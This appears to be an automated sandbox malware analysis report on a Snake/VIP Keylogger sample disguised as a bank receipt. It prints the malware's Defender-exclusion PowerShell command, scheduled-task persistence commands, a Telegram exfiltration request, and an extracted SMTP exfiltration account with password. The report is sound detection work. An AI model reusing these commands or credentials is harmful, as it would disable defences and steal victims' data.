Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont_html.exe

Overview

General Information

Sample name:e-dekont_html.exe
Analysis ID:1559103
MD5:3c1d34a25a8b8a96896e746f13c346bf
SHA1:31c17eebffbcb57a3a833c99541748e508d82714
SHA256:7bd9596f753e58ba917ba418c191af8fcb9b537e73ee6a86989960099585394f
Tags:exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • e-dekont_html.exe (PID: 3756 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7508 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7044 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • e-dekont_html.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
  • fahKSvwo.exe (PID: 7432 cmdline: C:\Users\user\AppData\Roaming\fahKSvwo.exe MD5: 3C1D34A25A8B8A96896E746F13C346BF)
    • schtasks.exe (PID: 7600 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fahKSvwo.exe (PID: 7696 cmdline: "C:\Users\user\AppData\Roaming\fahKSvwo.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x1aa0:$a1: get_encryptedPassword
    • 0x2028:$a2: get_encryptedUsername
    • 0x1713:$a3: get_timePasswordChanged
    • 0x182a:$a4: get_passwordField
    • 0x1ab6:$a5: set_encryptedPassword
    • 0x47d2:$a6: get_passwords
    • 0x4b66:$a7: get_logins
    • 0x47be:$a8: GetOutlookPasswords
    • 0x4177:$a9: StartKeylogger
    • 0x4abf:$a10: KeyLoggerEventArgs
    • 0x4217:$a11: KeyLoggerEventArgsEventHandler
    00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.e-dekont_html.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            8.2.e-dekont_html.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              8.2.e-dekont_html.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2dca0:$a1: get_encryptedPassword
              • 0x2e228:$a2: get_encryptedUsername
              • 0x2d913:$a3: get_timePasswordChanged
              • 0x2da2a:$a4: get_passwordField
              • 0x2dcb6:$a5: set_encryptedPassword
              • 0x309d2:$a6: get_passwords
              • 0x30d66:$a7: get_logins
              • 0x309be:$a8: GetOutlookPasswords
              • 0x30377:$a9: StartKeylogger
              • 0x30cbf:$a10: KeyLoggerEventArgs
              • 0x30417:$a11: KeyLoggerEventArgsEventHandler
              8.2.e-dekont_html.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x2f064:$s1: UnHook
              • 0x2f06b:$s2: SetHook
              • 0x2f073:$s3: CallNextHook
              • 0x2f080:$s4: _hook
              0.2.e-dekont_html.exe.3cdb750.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 23 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 6500, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 6500, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fahKSvwo.exe, ParentImage: C:\Users\user\AppData\Roaming\fahKSvwo.exe, ParentProcessId: 7432, ParentProcessName: fahKSvwo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", ProcessId: 7600, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", ProcessId: 7044, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 6500, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", ProcessId: 7044, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T07:52:14.228878+010028033053Unknown Traffic192.168.2.449737188.114.97.3443TCP
                2024-11-20T07:52:15.513508+010028033053Unknown Traffic192.168.2.449739188.114.97.3443TCP
                2024-11-20T07:52:19.513508+010028033053Unknown Traffic192.168.2.449745188.114.97.3443TCP
                2024-11-20T07:52:20.075811+010028033053Unknown Traffic192.168.2.449746188.114.97.3443TCP
                2024-11-20T07:52:21.872740+010028033053Unknown Traffic192.168.2.449752188.114.96.3443TCP
                2024-11-20T07:52:23.778611+010028033053Unknown Traffic192.168.2.449759188.114.96.3443TCP
                2024-11-20T07:52:24.029099+010028033053Unknown Traffic192.168.2.449760188.114.96.3443TCP
                2024-11-20T07:52:26.148930+010028033053Unknown Traffic192.168.2.449765188.114.96.3443TCP
                2024-11-20T07:52:27.582198+010028033053Unknown Traffic192.168.2.461283188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T07:52:12.696787+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                2024-11-20T07:52:13.697027+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                2024-11-20T07:52:15.024961+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
                2024-11-20T07:52:18.243695+010028032742Potentially Bad Traffic192.168.2.449741193.122.130.080TCP
                2024-11-20T07:52:19.462372+010028032742Potentially Bad Traffic192.168.2.449741193.122.130.080TCP
                2024-11-20T07:52:20.634261+010028032742Potentially Bad Traffic192.168.2.449749193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeVirustotal: Detection: 67%Perma Link
                Multi AV Scanner detection for submitted file
                Source: e-dekont_html.exeReversingLabs: Detection: 63%
                Source: e-dekont_html.exeVirustotal: Detection: 67%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: e-dekont_html.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: e-dekont_html.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61282 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61290 version: TLS 1.2
                Source: e-dekont_html.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: bbvK.pdbSHA256 source: e-dekont_html.exe, fahKSvwo.exe.0.dr
                Source: Binary string: bbvK.pdb source: e-dekont_html.exe, fahKSvwo.exe.0.dr
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 076B51BCh0_2_076B4965
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 02BEF8E9h8_2_02BEF631
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 02BEFD41h8_2_02BEFA88
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 4x nop then jmp 07254434h9_2_07253BDD
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 4x nop then jmp 0159F8E9h13_2_0159F631
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 4x nop then jmp 0159FD41h13_2_0159FA88

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61283 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
